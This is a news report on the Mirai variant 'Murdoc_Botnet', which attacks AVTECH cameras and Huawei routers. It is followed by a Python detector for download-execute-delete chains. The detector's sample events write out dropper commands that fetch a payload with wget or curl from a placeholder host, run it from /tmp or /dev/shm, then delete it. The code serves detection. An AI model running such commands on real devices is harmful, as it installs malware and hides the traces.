UPDATED 09:00 EST / JANUARY 21 2025


New Mirai variant ‘Murdoc_Botnet’ targets AVTECH cameras and Huawei routers

Researchers at cybersecurity software provider Qualys Inc. are warning of a new Mirai botnet variant that’s being used to target vulnerabilities in AVTECH Cameras and Huawei HG523 routers.

The variant, dubbed “Murdoc_Botnet,” was first detected in July and has so far compromised at least 1,300 devices worldwide, with most infections in Malaysia, Thailand, Mexico and Indonesia. Like every Mirai variant, its goal is to infect as many devices as possible and assemble them into new, large botnets.

The Qualys researchers found that Murdoc_Botnet employs a combination of ELF files and shell scripts to infiltrate devices. The scripts exploit vulnerabilities, such as CVE-2024-7029 and CVE-2017-17215, to deploy malware payloads and establish persistent connections with command-and-control servers.

The campaign’s infrastructure includes over 100 distinct command-and-control servers, each responsible for managing its share of compromised devices and propagating the malware to new ones. The servers communicate with infected devices to orchestrate activities such as payload execution, further infection and botnet expansion.

The Murdoc_Botnet favors internet of things devices, particularly AVTECH cameras and Huawei routers. It targets those devices because their known vulnerabilities are unlikely to be patched, ensuring a steady stream of new victims to grow its network.

The malware spreads by executing bash scripts that fetch and execute payloads. The scripts are also designed to remove traces of their activity after execution, making it harder for security tools to detect and mitigate the threat.

The Qualys researchers recommend that enterprise users and administrators make efforts to identify and protect against such attacks.

Recommended actions include regularly monitoring for suspicious processes, events and network traffic spawned by the execution of any untrusted binaries and scripts. Administrators and users should always be cautious about executing shell scripts from unknown or untrusted sources, and administrators should keep systems and firmware updated with the latest releases and patches.
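The process-monitoring recommendation above can be turned into a concrete check. The following is an added example written for this page, not code from Qualys or from the article: a small detector that scans process-execution events for the behaviour the article attributes to the dropper scripts (download a payload, run it, then delete the file). The event records and the hostnames in them are constructed sample data in a simplified (session id, timestamp, command line) shape, not a real EDR or auditd schema, and the tool and interpreter name lists are assumptions that a deployment would extend.

```python
"""Flag download-execute-delete chains in process execution events.

Added example, not code from the Qualys report or the article. The event
format is a constructed, simplified record rather than any real EDR or
auditd schema; hostnames use the reserved .invalid TLD.
"""
import shlex
from collections import defaultdict

# Constructed sample events: (session_id, timestamp_seconds, command line).
# Session 101 and 303 show the fetch/run/remove pattern; 202 is benign.
SAMPLE_EVENTS = [
    (101, 1000, "wget http://example.invalid/x86 -O /tmp/.a"),
    (101, 1001, "chmod +x /tmp/.a"),
    (101, 1002, "/tmp/.a"),
    (101, 1003, "rm -f /tmp/.a"),
    (202, 2000, "wget https://example.invalid/firmware.bin -O /var/tmp/fw.bin"),
    (202, 2500, "sha256sum /var/tmp/fw.bin"),
    (303, 3000, "curl -s http://example.invalid/sh -o /dev/shm/.s"),
    (303, 3001, "sh /dev/shm/.s"),
    (303, 3002, "rm /dev/shm/.s"),
]

# Assumed lists; extend for the fetch tools present on your devices.
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
INTERPRETERS = {"sh", "bash", "busybox"}
WINDOW_SECONDS = 60  # how long after the download we keep watching


def download_target(argv):
    """Return the explicit output path of a download command, or None."""
    if not argv or argv[0] not in DOWNLOADERS:
        return None
    for flag in ("-O", "-o"):
        if flag in argv:
            i = argv.index(flag)
            if i + 1 < len(argv):
                return argv[i + 1]
    return None


def executes_path(argv, path):
    """True if argv runs `path` directly, via an interpreter, or marks it executable."""
    if not argv:
        return False
    if argv[0] == path:
        return True
    if argv[0] in INTERPRETERS and path in argv[1:]:
        return True
    return argv[0] == "chmod" and path in argv[1:]


def deletes_path(argv, path):
    """True if argv removes `path`."""
    return bool(argv) and argv[0] == "rm" and path in argv[1:]


def find_fetch_exec_delete(events, window=WINDOW_SECONDS):
    """Return (session, path, download_ts, delete_ts) for each suspicious chain.

    A chain is: a download to `path`, then execution of `path`, then removal
    of `path`, all in one session and within `window` seconds of the download.
    """
    by_session = defaultdict(list)
    for sid, ts, cmd in events:
        by_session[sid].append((ts, shlex.split(cmd)))

    findings = []
    for sid, evs in by_session.items():
        evs.sort()
        for i, (ts0, argv0) in enumerate(evs):
            path = download_target(argv0)
            if path is None:
                continue
            executed = deleted = False
            last_ts = ts0
            for ts, argv in evs[i + 1:]:
                if ts - ts0 > window:
                    break
                if executes_path(argv, path):
                    executed = True
                elif executed and deletes_path(argv, path):
                    deleted, last_ts = True, ts
                    break
            if executed and deleted:
                findings.append((sid, path, ts0, last_ts))
    return findings


if __name__ == "__main__":
    for sid, path, t0, t1 in find_fetch_exec_delete(SAMPLE_EVENTS):
        print(f"session {sid}: {path} downloaded at {t0}, executed, removed at {t1}")
```

The detector deliberately requires all three steps in one session: a firmware download that is merely checksummed (session 202) is not flagged, which keeps the rule quiet on legitimate update activity. Feeding it real process telemetry means mapping your logging source's fields onto the (session, timestamp, command line) tuple and adding the busybox applet names used on the devices in question.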
